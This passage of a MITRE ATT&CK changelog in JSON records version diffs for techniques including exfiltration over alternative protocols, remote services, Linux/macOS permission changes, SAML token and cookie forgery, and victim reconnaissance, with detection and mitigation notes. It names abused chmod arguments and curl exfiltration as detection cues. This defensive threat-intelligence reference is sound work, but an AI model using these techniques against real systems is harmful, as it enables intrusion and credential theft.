{\"root['external_references'][3]\": {\"source_name\": \"University of Birmingham C2\", \"description\": \"Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.\", \"url\": \"https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf\"}, \"root['x_mitre_contributors'][0]\": \"William Cain\"}}",
"previous_version": "1.2",
"version_change": "1.2 \u2192 1.3",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may steal data by exfiltrating it over a differe | t | 1 | Adversaries may steal data by exfiltrating it over a differe |
| > | nt protocol than that of the existing command and control ch | > | nt protocol than that of the existing command and control ch | ||
| > | annel. The data may also be sent to an alternate network loc | > | annel. The data may also be sent to an alternate network loc | ||
| > | ation from the main command and control server. Alternate | > | ation from the main command and control server. Alternate | ||
| > | protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other | > | protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other | ||
| > | network protocol not being used as the main command and con | > | network protocol not being used as the main command and con | ||
| > | trol channel. Different protocol channels could also include | > | trol channel. Different protocol channels could also include | ||
| > | Web services such as cloud storage. Adversaries may also op | > | Web services such as cloud storage. Adversaries may also op | ||
| > | t to encrypt and/or obfuscate these alternate channels. [E | > | t to encrypt and/or obfuscate these alternate channels. [E | ||
| > | xfiltration Over Alternative Protocol](https://attack.mitre. | > | xfiltration Over Alternative Protocol](https://attack.mitre. | ||
| > | org/techniques/T1048) can be done using various common opera | > | org/techniques/T1048) can be done using various common opera | ||
| > | ting system utilities such as [Net](https://attack.mitre.org | > | ting system utilities such as [Net](https://attack.mitre.org | ||
| > | /software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct | > | /software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct | ||
| > | 2016) | > | 2016) On macOS and Linux <code>curl</code> may be used to in | ||
| > | voke protocols such as HTTP/S or FTP/S to exfiltrate data fr | ||||
| > | om a system.(Citation: 20 macOS Common Tools and Techniques) | ||||
| > |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may leverage external-facing remote services to | t | 1 | Adversaries may leverage external-facing remote services to |
| > | initially access and/or persist within a network. Remote ser | > | initially access and/or persist within a network. Remote ser | ||
| > | vices such as VPNs, Citrix, and other access mechanisms allo | > | vices such as VPNs, Citrix, and other access mechanisms allo | ||
| > | w users to connect to internal enterprise network resources | > | w users to connect to internal enterprise network resources | ||
| > | from external locations. There are often remote service gate | > | from external locations. There are often remote service gate | ||
| > | ways that manage connections and credential authentication f | > | ways that manage connections and credential authentication f | ||
| > | or these services. Services such as [Windows Remote Manageme | > | or these services. Services such as [Windows Remote Manageme | ||
| > | nt](https://attack.mitre.org/techniques/T1021/006) can also | > | nt](https://attack.mitre.org/techniques/T1021/006) and [VNC] | ||
| > | be used externally. Access to [Valid Accounts](https://atta | > | (https://attack.mitre.org/techniques/T1021/005) can also be | ||
| > | ck.mitre.org/techniques/T1078) to use the service is often a | > | used externally.(Citation: MacOS VNC software for Remote Des | ||
| > | requirement, which could be obtained through credential pha | > | ktop) Access to [Valid Accounts](https://attack.mitre.org/t | ||
| > | rming or by obtaining the credentials from users after compr | > | echniques/T1078) to use the service is often a requirement, | ||
| > | omising the enterprise network.(Citation: Volexity Virtual P | > | which could be obtained through credential pharming or by ob | ||
| > | rivate Keylogging) Access to remote services may be used as | > | taining the credentials from users after compromising the en | ||
| > | a redundant or persistent access mechanism during an operati | > | terprise network.(Citation: Volexity Virtual Private Keylogg | ||
| > | on. Access may also be gained through an exposed service th | > | ing) Access to remote services may be used as a redundant or | ||
| > | at doesn\u2019t require authentication. In containerized environm | > | persistent access mechanism during an operation. Access ma | ||
| > | ents, this may include an exposed Docker API, Kubernetes API | > | y also be gained through an exposed service that doesn\u2019t req | ||
| > | server, kubelet, or web application such as the Kubernetes | > | uire authentication. In containerized environments, this may | ||
| > | dashboard.(Citation: Trend Micro Exposed Docker Server)(Cita | > | include an exposed Docker API, Kubernetes API server, kubel | ||
| > | tion: Unit 42 Hildegard Malware) | > | et, or web application such as the Kubernetes dashboard.(Cit | ||
| > | ation: Trend Micro Exposed Docker Server)(Citation: Unit 42 | ||||
| > | Hildegard Malware) |
chown (short for change owner), and chmod (short for change mode).\n\nAdversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and Techniques) ",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1222/002",
"external_id": "T1222.002"
},
{
"source_name": "Hybrid Analysis Icacls1 June 2018",
"description": "Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018.",
"url": "https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100"
},
{
"source_name": "Hybrid Analysis Icacls2 May 2018",
"description": "Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018.",
"url": "https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110"
},
{
"source_name": "20 macOS Common Tools and Techniques",
"description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.",
"url": "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Command: Command Execution",
"File: File Metadata"
],
"x_mitre_detection": "Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Commonly abused command arguments include chmod +x, chmod -R 755, and chmod 777.(Citation: 20 macOS Common Tools and Techniques) \n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User",
"root"
],
"x_mitre_platforms": [
"macOS",
"Linux"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-09-13 21:08:09.985000+00:00\", \"old_value\": \"2020-03-29 23:12:40.041000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\\n\\nMost Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform\\u2019s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode).\\n\\nAdversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and Techniques) \", \"old_value\": \"Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\\n\\nMost Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform\\u2019s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode).\\n\\nAdversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).\", \"diff\": \"--- \\n+++ \\n@@ -2,4 +2,4 @@\\n \\n Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform\\u2019s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode).\\n \\n-Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).\\n+Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and Techniques) \"}, \"root['x_mitre_detection']\": {\"new_value\": \"Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Commonly abused command arguments include chmod +x, chmod -R 755, and chmod 777.(Citation: 20 macOS Common Tools and Techniques) \\n\\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files.\", \"old_value\": \"Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\\n\\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n-Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\\n+Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Commonly abused command arguments include chmod +x, chmod -R 755, and chmod 777.(Citation: 20 macOS Common Tools and Techniques) \\n \\n Consider enabling file/directory permission change auditing on folders containing key binary/configuration files.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][3]\": {\"source_name\": \"20 macOS Common Tools and Techniques\", \"description\": \"Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.\", \"url\": \"https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may modify file or directory permissions/attribu | t | 1 | Adversaries may modify file or directory permissions/attribu |
| > | tes to evade access control lists (ACLs) and access protecte | > | tes to evade access control lists (ACLs) and access protecte | ||
| > | d files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citati | > | d files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citati | ||
| > | on: Hybrid Analysis Icacls2 May 2018) File and directory per | > | on: Hybrid Analysis Icacls2 May 2018) File and directory per | ||
| > | missions are commonly managed by ACLs configured by the file | > | missions are commonly managed by ACLs configured by the file | ||
| > | or directory owner, or users with the appropriate permissio | > | or directory owner, or users with the appropriate permissio | ||
| > | ns. File and directory ACL implementations vary by platform, | > | ns. File and directory ACL implementations vary by platform, | ||
| > | but generally explicitly designate which users or groups ca | > | but generally explicitly designate which users or groups ca | ||
| > | n perform which actions (read, write, execute, etc.). Most | > | n perform which actions (read, write, execute, etc.). Most | ||
| > | Linux and Linux-based platforms provide a standard set of pe | > | Linux and Linux-based platforms provide a standard set of pe | ||
| > | rmission groups (user, group, and other) and a standard set | > | rmission groups (user, group, and other) and a standard set | ||
| > | of permissions (read, write, and execute) that are applied t | > | of permissions (read, write, and execute) that are applied t | ||
| > | o each group. While nuances of each platform\u2019s permissions i | > | o each group. While nuances of each platform\u2019s permissions i | ||
| > | mplementation may vary, most of the platforms provide two pr | > | mplementation may vary, most of the platforms provide two pr | ||
| > | imary commands used to manipulate file and directory ACLs: < | > | imary commands used to manipulate file and directory ACLs: < | ||
| > | code>chown</code> (short for change owner), and <code>chmod< | > | code>chown</code> (short for change owner), and <code>chmod< | ||
| > | /code> (short for change mode). Adversarial may use these c | > | /code> (short for change mode). Adversarial may use these c | ||
| > | ommands to make themselves the owner of files and directorie | > | ommands to make themselves the owner of files and directorie | ||
| > | s or change the mode if current permissions allow it. They c | > | s or change the mode if current permissions allow it. They c | ||
| > | ould subsequently lock others out of the file. Specific file | > | ould subsequently lock others out of the file. Specific file | ||
| > | and directory modifications may be a required step for many | > | and directory modifications may be a required step for many | ||
| > | techniques, such as establishing Persistence via [Unix Shel | > | techniques, such as establishing Persistence via [Unix Shel | ||
| > | l Configuration Modification](https://attack.mitre.org/techn | > | l Configuration Modification](https://attack.mitre.org/techn | ||
| > | iques/T1546/004) or tainting/hijacking other instrumental bi | > | iques/T1546/004) or tainting/hijacking other instrumental bi | ||
| > | nary/configuration files via [Hijack Execution Flow](https:/ | > | nary/configuration files via [Hijack Execution Flow](https:/ | ||
| > | /attack.mitre.org/techniques/T1574). | > | /attack.mitre.org/techniques/T1574).(Citation: 20 macOS Comm | ||
| > | on Tools and Techniques) |
NotOnOrAfter value of the conditions ... element in a token. This value can be changed using the AccessTokenLifetime in a LifetimeTokenPolicy.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)\n\nAn adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.\n\nAn adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "credential-access"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1606/002",
"external_id": "T1606.002"
},
{
"source_name": "Microsoft SolarWinds Steps",
"description": "Lambert, J. (2020, December 13). Important steps for customers to protect themselves from recent nation-state cyberattacks. Retrieved December 17, 2020.",
"url": "https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/"
},
{
"source_name": "Microsoft SAML Token Lifetimes",
"description": "Microsoft. (2020, December 14). Configurable token lifetimes in Microsoft Identity Platform. Retrieved December 22, 2020.",
"url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-configurable-token-lifetimes"
},
{
"source_name": "Cyberark Golden SAML",
"description": "Reiner, S. (2017, November 21). Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps. Retrieved December 17, 2020.",
"url": "https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps"
},
{
"source_name": "Microsoft SolarWinds Customer Guidance",
"description": "MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 17, 2020.",
"url": "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/"
},
{
"source_name": "Sygnia Golden SAML",
"description": "Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021.",
"url": "https://www.sygnia.co/golden-saml-advisory"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Jen Burns, HubSpot",
"Blake Strom, Microsoft 365 Defender",
"Oleg Kolesnikov, Securonix"
],
"x_mitre_data_sources": [
"Logon Session: Logon Session Creation",
"Web Credential: Web Credential Creation",
"Web Credential: Web Credential Usage"
],
"x_mitre_detection": "This technique may be difficult to detect as SAML tokens are signed by a trusted certificate. The forging process may not be detectable since it is likely to happen outside of a defender's visibility, but subsequent usage of the forged token may be seen. Monitor for anomalous logins using SAML tokens created by a compromised or adversary generated token-signing certificate. These logins may occur on any on-premises resources as well as from any cloud environment that trusts the certificate.(Citation: Microsoft SolarWinds Customer Guidance) Search for logins to service providers using SAML SSO which do not have corresponding 4769, 1200, and 1202 events in the Domain.(Citation: Sygnia Golden SAML)\n\nConsider modifying SAML responses to include custom elements for each service provider. Monitor these custom elements in service provider access logs to detect any anomalous requests.(Citation: Sygnia Golden SAML)",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator"
],
"x_mitre_platforms": [
"Azure AD",
"SaaS",
"Windows",
"Office 365",
"Google Workspace",
"IaaS"
],
"x_mitre_version": "1.2",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-09-20 16:47:19.173000+00:00\", \"old_value\": \"2021-04-14 14:29:27.290000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}, \"iterable_item_added\": {\"root['x_mitre_contributors'][0]\": \"Jen Burns, HubSpot\", \"root['x_mitre_platforms'][5]\": \"IaaS\"}}",
"previous_version": "1.1",
"version_change": "1.1 \u2192 1.2",
"changelog_mitigations": {
"shared": [
"M1015: Active Directory Configuration",
"M1018: User Account Management",
"M1026: Privileged Account Management",
"M1047: Audit"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0006: Web Credential (Web Credential Creation)",
"DS0006: Web Credential (Web Credential Usage)",
"DS0028: Logon Session (Logon Session Creation)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-12-17 02:14:34.178000+00:00",
"modified": "2021-09-20 16:48:28.041000+00:00",
"name": "Web Cookies",
"description": "Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.\n\nAdversaries may generate these cookies in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.(Citation: Pass The Cookie) The generation of web cookies often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.\n\nOnce forged, adversaries may use these web cookies to access resources ([Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Volexity SolarWinds)(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "credential-access"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1606/001",
"external_id": "T1606.001"
},
{
"source_name": "Pass The Cookie",
"description": "Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.",
"url": "https://wunderwuzzi23.github.io/blog/passthecookie.html"
},
{
"source_name": "Volexity SolarWinds",
"description": "Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.",
"url": "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/"
},
{
"source_name": "Unit 42 Mac Crypto Cookies January 2019",
"description": "Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved October 14, 2019.",
"url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Jen Burns, HubSpot"
],
"x_mitre_data_sources": [
"Logon Session: Logon Session Creation",
"Web Credential: Web Credential Creation",
"Web Credential: Web Credential Usage"
],
"x_mitre_detection": "Monitor for anomalous authentication activity, such as logons or other user session activity associated with unknown accounts. Monitor for unexpected and abnormal access to resources, including access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.",
"x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows",
"SaaS",
"IaaS"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_contributors']\": [\"Jen Burns, HubSpot\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-09-20 16:48:28.041000+00:00\", \"old_value\": \"2021-01-11 20:31:36.404000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['x_mitre_platforms'][4]\": \"IaaS\"}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1047: Audit",
"M1054: Software Configuration"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0006: Web Credential (Web Credential Creation)",
"DS0006: Web Credential (Web Credential Usage)",
"DS0028: Logon Session (Logon Session Creation)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-10-02 16:39:33.966000+00:00",
"modified": "2021-10-17 16:35:09.878000+00:00",
"name": "Gather Victim Host Information",
"description": "Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "reconnaissance"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1592",
"external_id": "T1592"
},
{
"source_name": "ATT ScanBox",
"description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.",
"url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks"
},
{
"source_name": "ThreatConnect Infrastructure Dec 2020",
"description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.",
"url": "https://threatconnect.com/blog/infrastructure-research-hunting/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Internet Scan: Response Content"
],
"x_mitre_detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
"x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"PRE"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_data_sources']\": [\"Internet Scan: Response Content\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-17 16:35:09.878000+00:00\", \"old_value\": \"2021-04-15 03:23:58.024000+00:00\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\\n\\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.\", \"old_value\": \"Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\\n\\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n-Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\\n+Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\\n \\n-Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.\\n+Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][2]\": {\"source_name\": \"ThreatConnect Infrastructure Dec 2020\", \"description\": \"ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.\", \"url\": \"https://threatconnect.com/blog/infrastructure-research-hunting/\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1056: Pre-compromise"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0035: Internet Scan (Response Content)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--774ad5bb-2366-4c13-a8a9-65e50b292e7c",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-10-02 16:47:16.719000+00:00",
"modified": "2021-10-17 16:35:09.668000+00:00",
"name": "Client Configurations",
"description": "Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "reconnaissance"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1592/004",
"external_id": "T1592.004"
},
{
"source_name": "ATT ScanBox",
